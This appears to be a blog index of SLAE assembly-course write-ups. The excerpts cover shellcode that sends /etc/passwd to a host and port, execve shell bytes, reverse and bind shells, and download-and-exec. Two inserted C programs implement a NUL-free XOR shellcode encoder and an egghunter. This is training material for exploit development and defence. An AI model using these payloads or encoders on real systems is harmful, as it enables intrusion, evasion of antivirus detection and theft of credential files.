-
SLAE: Shellcode read and send file
Because it is so much fun, I developed a shellcode that reads /etc/passwd and then sends the content to 127.1.1.1 port 12345. Here it is: shellcode.c /* ; Author: Daniel Sauder ; Website: https://govolution.wordpress.com/about ; License http://creativecommons.org/licenses/by-sa/3.0/ ; Shellcode reads /etc/passwd and sends the content to 127.1.1.1 port 12345. ; The file can be…
-
SLAE Assignment 7: Crypter
This is the last assignment, and it is about writing a crypter/decrypter. I used Python and PyCrypto for this task. The execve shellcode starts a shell. The scripts use AES (CBC mode with a fixed key and IV) for encryption and decryption; the plaintext is padded up to a multiple of the 16-byte AES block size before encrypting. Here is the code for encryption: encode.py from Crypto.Cipher import AES plain=("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80") obj=AES.new('Passphrase123456', AES.MODE_CBC, 'IVIVIVIVIVI12345') l=len(plain) r=l%16 p=16-r print "offset: "…
-
SLAE Assignment 6: Polymorphic Shellcode
This assignment is about writing polymorphic versions of shellcodes downloaded from shell-storm.org. Kill all Processes Shellcode I want to start with a simple one, a shellcode for killing processes, which can be found at http://www.shell-storm.org/shellcode/files/shellcode-212.php. Here is the original assembler code: killall_orig.nasm section .text global _start _start: ; kill(-1, SIGKILL) push byte 37 pop eax…
-
SLAE Assignment 5: Shellcode Analysis
Assignment five is about analyzing three different shellcodes, created with msfpayload for Linux/x86. linux/x86/exec I chose the linux/x86/exec shellcode as the first example. With: $ msfpayload linux/x86/exec cmd="ls" R | ndisasm -u - it is possible to disassemble the shellcode: 00000000 6A0B push byte +0xb 00000002 58 pop eax 00000003 99 cdq 00000004 52 push edx…
-
SLAE Assignment 4: Custom Encoder
This one is about building a custom encoder and decoder. For this I used an insertion/XOR encoder: it processes the shellcode byte by byte, inserts a random value next to each byte, and XORs the byte with that value. The decoder stub then walks the pairs, XORs each byte with its random value again and drops the inserted byte. This way, we have a shellcode that has nothing to do with the original…
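The encode/decode round trip described above, as an added example in C that is not the encoder from the original post. It assumes the random value is placed right after the byte it encodes and draws the "random" values from a seeded xorshift32 PRNG so the output is reproducible; it also re-draws any value that would put a 0x00 into the encoded stream, a check the decoder stub itself cannot do for you.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example (not the page's encoder): an insertion/XOR codec.
 * Every payload byte b becomes the pair (b ^ k, k), where k is a fresh
 * "random" byte, so the encoded blob is twice as long and shares no byte
 * sequence with the original.  Keys come from a seeded xorshift32 PRNG
 * (assumption, for reproducibility) and are re-drawn whenever k or b ^ k
 * would be 0x00: a NUL anywhere in the encoded stream would truncate a
 * payload delivered through strcpy()-style copies. */

/* execve("/bin//sh") shellcode, the same 25 bytes quoted on the page */
const uint8_t execve_shellcode[] = {
    0x31,0xc0,0x50,0x68,0x2f,0x2f,0x73,0x68,0x68,0x2f,0x62,0x69,0x6e,
    0x89,0xe3,0x50,0x89,0xe2,0x53,0x89,0xe1,0xb0,0x0b,0xcd,0x80
};

static uint32_t prng_state;

static uint8_t prng_byte(void) {
    uint32_t x = prng_state;   /* xorshift32: never reaches 0 from a non-zero seed */
    x ^= x << 13; x ^= x >> 17; x ^= x << 5;
    prng_state = x;
    return (uint8_t)x;
}

/* Encode len bytes from in into out (out must hold 2*len). Returns bytes written. */
size_t insert_xor_encode(const uint8_t *in, size_t len, uint8_t *out, uint32_t seed) {
    size_t o = 0;
    prng_state = seed ? seed : 0x9E3779B9u;
    for (size_t i = 0; i < len; i++) {
        uint8_t k;
        /* reject keys that would leave a NUL in either half of the pair */
        do { k = prng_byte(); } while (k == 0 || (uint8_t)(in[i] ^ k) == 0);
        out[o++] = in[i] ^ k;   /* encoded byte */
        out[o++] = k;           /* the inserted value that decodes it */
    }
    return o;
}

/* Decode: XOR each (encoded, key) pair and drop the key; this is the loop
 * the assembler decoder stub performs.  Returns bytes written, or 0 for an
 * odd-length (malformed) input. */
size_t insert_xor_decode(const uint8_t *enc, size_t enc_len, uint8_t *out) {
    if (enc_len == 0 || enc_len % 2) return 0;
    size_t o = 0;
    for (size_t i = 0; i + 1 < enc_len; i += 2)
        out[o++] = enc[i] ^ enc[i + 1];
    return o;
}

/* Count NUL bytes; the encoder guarantees zero for its output. */
size_t count_nul(const uint8_t *buf, size_t len) {
    size_t n = 0;
    for (size_t i = 0; i < len; i++) n += (buf[i] == 0);
    return n;
}

/* Full round trip on the execve shellcode; returns 1 on success, 0 otherwise. */
int roundtrip_ok(uint32_t seed) {
    uint8_t enc[2 * sizeof execve_shellcode], dec[sizeof execve_shellcode];
    size_t n = insert_xor_encode(execve_shellcode, sizeof execve_shellcode, enc, seed);
    if (n != 2 * sizeof execve_shellcode || count_nul(enc, n) != 0) return 0;
    if (insert_xor_decode(enc, n, dec) != sizeof execve_shellcode) return 0;
    return memcmp(dec, execve_shellcode, sizeof execve_shellcode) == 0;
}

int main(void) {
    uint8_t enc[2 * sizeof execve_shellcode];
    size_t n = insert_xor_encode(execve_shellcode, sizeof execve_shellcode, enc, 1234);
    printf("encoded (%zu bytes):", n);
    for (size_t i = 0; i < n; i++) printf("\\x%02x", enc[i]);
    printf("\nroundtrip: %s\n", roundtrip_ok(1234) ? "ok" : "FAILED");
    return 0;
}
```

The doubling of the payload size is the price of this scheme; in exchange the decoder stub stays tiny (load pair, XOR, store, advance), which is why it is a popular first custom encoder.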
-
SLAE Assignment 3: Egghunter Demo
This assignment is about writing a working demo of an egghunter. An egghunter is basically a small piece of code that searches memory for a code word (the egg). Once the egg is found, the egghunter jumps to the address right behind the egg and executes the code located there. For…
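A C model of the search the egghunter stub performs, added here as an example and not the demo from the original post. It assumes the common "w00t" egg, assumes the payload is tagged with the egg twice in a row, and replaces the real hunter's "is this page mapped?" syscall check with a caller-supplied callback over a constructed fake address space, so it can be run without touching live memory.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not the page's egghunter.  Two details of real hunters
 * are modelled explicitly:
 *  - the hunter itself carries one copy of the egg (the immediate it
 *    compares against), so it looks for the egg twice in a row; a search
 *    for a single egg would hit the hunter's own code first;
 *  - a real hunter checks that a page is mapped (typically with a harmless
 *    syscall) before reading it; here is_readable() plays that role over a
 *    fake address space that contains an "unmapped" hole. */

#define EGG_LEN 4

typedef int (*readable_fn)(size_t offset, size_t len);

/* Scan buf[0..len) for the egg repeated twice.  Returns the offset of the
 * first byte after the second copy (where the payload starts) or -1.
 * Windows that is_readable() rejects are skipped, like unmapped pages. */
long egghunt(const uint8_t *buf, size_t len, const uint8_t egg[EGG_LEN],
             readable_fn is_readable) {
    for (size_t i = 0; i + 2 * EGG_LEN <= len; i++) {
        if (is_readable && !is_readable(i, 2 * EGG_LEN)) continue;
        if (memcmp(buf + i, egg, EGG_LEN) == 0 &&
            memcmp(buf + i + EGG_LEN, egg, EGG_LEN) == 0)
            return (long)(i + 2 * EGG_LEN);
    }
    return -1;
}

/* Single-egg search, kept only to show why the doubled form is needed. */
long egghunt_single(const uint8_t *buf, size_t len, const uint8_t egg[EGG_LEN]) {
    for (size_t i = 0; i + EGG_LEN <= len; i++)
        if (memcmp(buf + i, egg, EGG_LEN) == 0) return (long)(i + EGG_LEN);
    return -1;
}

/* Constructed fake address space (assumption):
 * [hunter with one egg copy][unmapped hole that happens to contain egg+egg]
 * [filler][egg egg payload] */
#define HOLE_START 32
#define HOLE_END   48
#define PAYLOAD_AT 72
static const uint8_t egg[EGG_LEN] = { 'w', '0', '0', 't' };
static uint8_t space[96];
static const uint8_t payload[] = { 0x31, 0xc0, 0xcd, 0x80 };  /* marker bytes only */

/* "Unmapped" if any byte of [off, off+n) falls inside the hole. */
static int fake_readable(size_t off, size_t n) {
    return off + n <= HOLE_START || off >= HOLE_END;
}

/* Build the space; returns the offset at which the payload was placed. */
size_t build_space(void) {
    memset(space, 0x90, sizeof space);                 /* NOP filler */
    memcpy(space + 8, egg, EGG_LEN);                   /* hunter's own immediate */
    memset(space + HOLE_START, 0xff, HOLE_END - HOLE_START);
    memcpy(space + 36, egg, EGG_LEN);                  /* a decoy inside the hole: */
    memcpy(space + 40, egg, EGG_LEN);                  /* reading it would fault for real */
    memcpy(space + PAYLOAD_AT - 2 * EGG_LEN, egg, EGG_LEN);
    memcpy(space + PAYLOAD_AT - EGG_LEN, egg, EGG_LEN);
    memcpy(space + PAYLOAD_AT, payload, sizeof payload);
    return PAYLOAD_AT;
}

int main(void) {
    build_space();
    printf("double egg, page check : %ld\n", egghunt(space, sizeof space, egg, fake_readable));
    printf("double egg, no check   : %ld (lands in the hole)\n", egghunt(space, sizeof space, egg, NULL));
    printf("single egg             : %ld (the hunter's own copy)\n", egghunt_single(space, sizeof space, egg));
    return 0;
}
```

The real stub gets the same three outcomes: without the page check it faults on the first unmapped page it scans; with only a single egg it finds itself.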
-
SLAE Assignment 2: Reverse Shell
What it is about:
• Create a Shell_Reverse_TCP shellcode
  – Reverse connects to configured IP and Port
  – Execs shell on successful connection
• IP and Port should be easily configurable
Here is the C code I used for prototyping the assembler code: reverseshellds.c #include <unistd.h> #include <string.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> int main(void) {…
-
SLAE Assignment 1: Bind Shell
What it is about:
• Create a Shell_Bind_TCP shellcode
  – Binds to a port
  – Execs Shell on incoming connection
• Port number should be easily configurable
Here is the C code for the bind shell, I used it for modelling the assembler code: bindshellds.c #include <unistd.h> #include <string.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> int main(void)…
-
An Analysis of Shikata-Ga-Nai
Trivia: Shikata ga nai is Japanese and means something like "nothing can be done about it". https://en.wikipedia.org/wiki/Shikata_ga_nai Learning is always fun, and I was playing around with writing ClamAV signatures. I wondered whether it is possible to write a signature that matches the famous Shikata-Ga-Nai shellcode encoder shipping with Metasploit. After all I succeeded to…
-
Writing a download and exec shellcode
After completing the tasks for the SLAE certification, I went on to write a shellcode for downloading and executing a file. For this task I want to use wget with execve. But first, some pseudocode:
start
execve wget file_x
chmod +x file_x
execve file_x
end
So that is the plan. See a problem here? Look at the…